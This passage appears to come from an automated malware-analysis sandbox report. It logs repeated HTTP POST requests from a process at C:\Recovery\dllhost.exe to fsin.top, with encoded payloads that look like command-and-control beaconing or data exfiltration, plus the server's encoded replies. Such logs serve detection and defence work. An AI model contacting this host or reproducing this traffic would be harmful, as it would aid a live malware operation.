                                                  Data Ascii: T_XWZZX\\^ZQTSWRWV^WVUQ_[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!$)["?'\)+6T>5&1$&Y.&#/.;#+ &%&G#.X!0
                                                  Aug 1, 2024 07:38:30.008982897 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:30.161134005 CEST586INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:30 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sos%2FBPEnN3ad6fnjI512XkOy27akO7dSkIF6c0rljTwtobi4R7G1xgntZsclMx%2B4ateS8183E9YZ6kDhLhgXemmlvlyTPPzT%2BXPUKT596Q%2Fagi4iQgiUDKp2Lg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b794eb243e0-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  89192.168.2.449826172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:30.311141014 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:30.679275036 CEST1012OUTData Raw: 54 5e 58 53 5a 55 58 51 5c 5e 5a 51 54 5f 57 56 57 53 5e 5f 56 5f 51 5a 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: T^XSZUXQ\^ZQT_WVWS^_V_QZ[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"3&!$Z'/+>5%8,&/&^1 <8.<#(8&%&G#.X!
                                                  Aug 1, 2024 07:38:30.782387018 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:31.038536072 CEST581INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:30 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vc3MCU203LFHfRGSDMgBarpeeN7GwLHbC4ItrPLoEjyEE0OhpKNAyT6W78%2Bzka7Gq%2BhujRRHF%2BC8FJTPZ2cTgBmKu5HQY4MdqgEcHzENGq4EavjC2FbUTMO%2FlQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b7e09340f42-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a
                                                  Data Ascii: 40W[Y
                                                  Aug 1, 2024 07:38:31.130588055 CEST5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  90192.168.2.449827172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:31.257999897 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:31.615725994 CEST1012OUTData Raw: 54 55 58 50 5f 5e 58 5c 5c 5e 5a 51 54 5e 57 54 57 51 5e 56 56 5a 51 58 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TUXP_^X\\^ZQT^WTWQ^VVZQX[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!%":"-8[3?+(1*6>\28#P2*1 T;?^5^7X'5&G#.X!
                                                  Aug 1, 2024 07:38:31.703639030 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:31.918080091 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:31.940352917 CEST586INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:31 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PPp%2FkpFlBXO9mObquQQWtWrjufgfaMZ1Pzw%2F5C9kf9xJxkDbsVLR6YtfEmw5EL%2Fm%2B1T8IjodI31N2EilDvqnnWupuatAhTAvks3xU91RUzHn5kPhkZjaPk0NFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b83d85cc326-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  91192.168.2.449828172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:32.075002909 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1008
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:32.428235054 CEST1008OUTData Raw: 54 50 58 55 5f 5e 5d 50 5c 5e 5a 51 54 56 57 55 57 55 5e 57 56 55 51 5e 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TPXU_^]P\^ZQTVWUWU^WVUQ^[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"Z$2)5=8X3%?\<82W*&!2?R&,2^%38 68&5&G#.X!<
                                                  Aug 1, 2024 07:38:32.531980038 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:32.773020983 CEST586INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:32 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RLzOpiEChnMSGtR1IpDiSjvZt8ihqxBH6Hud0hGadDwW8j%2FS4FuoaftiVlUVCh6MIf3M%2FPuocvZOJl9PwwaNZOImPjv8Cz5kBlcRT%2BPuxUowp6FOQB8bf%2FU6uA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b890beb4321-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  92192.168.2.449829172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:32.901392937 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:33.256136894 CEST1012OUTData Raw: 51 53 5d 57 5f 5e 58 54 5c 5e 5a 51 54 55 57 56 57 50 5e 57 56 59 51 5d 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QS]W_^XT\^ZQTUWVWP^WVYQ][]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"_'"6.'$?<(.=%.1 %&T8=?5(%&G#.X!(
                                                  Aug 1, 2024 07:38:33.354757071 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:33.614284992 CEST588INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:33 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MtAOFGFYqyZqdQZV5jiLGovzc5OKA%2Fzo29fTQZDmWI6nOPHbNthIN5irIsIzPZsYUO3jgDGMJ%2BWkFMmC3tI3TAwOLP%2Br4kRREGS8aTUc6x7wStGh%2BWX6pZi%2FQg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b8e2a2b0cc4-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  93192.168.2.449830172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:33.759836912 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:34.115406036 CEST1012OUTData Raw: 54 56 5d 56 5a 5f 58 50 5c 5e 5a 51 54 57 57 53 57 54 5e 5d 56 5f 51 5f 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TV]VZ_XP\^ZQTWWSWT^]V_Q_[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"$T%]!#'5;X(+1=6)1;?%/"$3$-.(#8#%&G#.X!
                                                  Aug 1, 2024 07:38:34.244972944 CEST25INHTTP/1.1 100 Continue


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  94192.168.2.449831172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:34.418827057 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1284
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:34.772032976 CEST1284OUTData Raw: 54 52 5d 50 5a 5e 5d 54 5c 5e 5a 51 54 54 57 54 57 57 5e 56 56 59 51 5e 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TR]PZ^]T\^ZQTTWTWW^VVYQ^[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"%1:!-4X$6;Y(8-=%6&7%6X&?,;_"(,1&G#.X!,
                                                  Aug 1, 2024 07:38:34.861565113 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:35.057178974 CEST735INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:35 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ha7afMufcEzOKQMVgDh%2FavTFkS1My%2BneG4o51kWigKXV72328kjfDri3%2F6ToFPSGbCJiYQqOrCvsLAvLOxtg71waLkEPpDa%2BynqejdUE6TQMqllInI5TIXCigA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b979fb24303-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 39 38 0d 0a 02 1f 22 51 33 01 3a 1c 36 14 33 0a 3d 0c 00 0b 3e 33 38 17 3c 5f 2f 5f 25 3f 22 01 27 28 28 1f 21 02 3d 5c 33 01 04 55 25 0b 2d 01 2a 1d 21 51 04 11 26 14 37 33 29 05 3d 5f 2f 58 24 38 3c 07 23 18 33 02 27 23 29 13 22 39 12 1b 3d 21 21 1e 3f 1c 0d 52 2f 3b 3c 07 3f 0d 0a 58 31 1c 2a 56 0d 17 22 50 2d 38 34 56 26 22 3b 0e 20 2c 02 0c 23 3b 3a 03 29 11 25 00 2a 0a 22 1d 2d 33 37 5e 3d 0a 32 52 2a 2d 0f 13 2b 39 2d 50 33 39 22 5d 2c 03 2d 48 0e 3d 59 4d 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 98"Q3:63=>38<_/_%?"'((!=\3U%-*!Q&73)=_/X$8<#3'#)"9=!!?R/;<?X1*V"P-84V&"; ,#;:)%*"-37^=2R*-+9-P39"],-H=YM0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  95192.168.2.449832172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:34.544436932 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:34.896852970 CEST1012OUTData Raw: 51 50 58 56 5a 5b 58 5c 5c 5e 5a 51 54 5e 57 55 57 5f 5e 58 56 55 51 5a 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QPXVZ[X\\^ZQT^WUW_^XVUQZ[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"[3["-$;^);%)%*^1 %1#4T,/^"?%&G#.X!
                                                  Aug 1, 2024 07:38:34.989065886 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:35.152575016 CEST584INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:35 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F44Up4BjhrJlwlOtjQ6xkU2FjWhxgEMWqYavzN0K3CUW%2FGErLRmQ6SslOuXAwTC1d4G8YB13uHktbFjHEeEL%2F48cV09sz4lqTLJuuK6G8OJmtvvCFsPeY63DQA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b986a0542fb-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  96192.168.2.449833172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:35.278922081 CEST250OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:38:35.631474972 CEST1012OUTData Raw: 51 52 58 53 5a 5c 58 57 5c 5e 5a 51 54 54 57 52 57 50 5e 5e 56 5f 51 54 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QRXSZ\XW\^ZQTTWRWP^^V_QT[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"'"=#=;0S?]<>=>Y'(W%,*X23/,",%&G#.X!,
                                                  Aug 1, 2024 07:38:35.733030081 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:35.975475073 CEST584INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:35 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=URu%2BUXIE88NHYkzQ1X8xSIkke4JrPQDpgWjGNMj5mUM45Hwhs7JaNxfT5p%2FazpV42JzuNUbzqG9cZVGbgmqEG13lAQv6kl3geNC5iUZrZT%2FBTm5uaI7odXMeEA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b9d09527ced-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  97192.168.2.449834172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:36.107959986 CEST250OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:38:36.458986998 CEST1012OUTData Raw: 54 50 58 55 5f 5f 5d 51 5c 5e 5a 51 54 53 57 57 57 54 5e 59 56 58 51 5b 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TPXU__]Q\^ZQTSWWWT^YVXQ[[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!0)6'0/X(8!?%\';'R&%$3/3^!^;^15&G#.X!0
                                                  Aug 1, 2024 07:38:36.561866045 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:36.803786993 CEST580INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:36 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=43Sx72Tlb%2BRE2kC6aLlP11otH61zwPw14F8rQ699JYVgD8jyvI2MU6zXwpRqdJKALD2vXQi63FWYTVXHoUPCffcFWN8ua3sathW4lC2UC0CLC0J0S53L7kBbpg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37ba23c160cc2-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  98192.168.2.449835172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:36.933092117 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1008
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:37.287194967 CEST1008OUTData Raw: 54 5e 58 5d 5a 58 5d 57 5c 5e 5a 51 54 56 57 51 57 50 5e 5b 56 5b 51 5b 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: T^X]ZX]W\^ZQTVWQWP^[V[Q[[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"%1=]![$0S;)+.W*5-1811% U8.$5^#&%&G#.X!,
                                                  Aug 1, 2024 07:38:37.378962994 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:37.549602985 CEST586INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:37 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wBtI8FlRFuuSOfaM269X7nWCDlpbZTHogV4Qj0JYJQTFWP%2FsEH%2FtFnSVzwjviymlf5mzO%2FeRTcJeaeB%2BkJS18f3JXuUbopIITkZV8Z1rIhbpGg5drA8owVfW0g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37ba75e8dc34d-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  99192.168.2.449836172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:37.683608055 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:38.040499926 CEST1012OUTData Raw: 54 56 58 55 5a 5d 58 54 5c 5e 5a 51 54 52 57 56 57 5e 5e 5c 56 5d 51 5d 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TVXUZ]XT\^ZQTRWVW^^\V]Q][]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"32*"$5]?-*5-&8<%"$3,R;X?"^ %&G#.X!4
                                                  Aug 1, 2024 07:38:38.163320065 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:38.399863005 CEST578INHTTP/1.1 200 OK
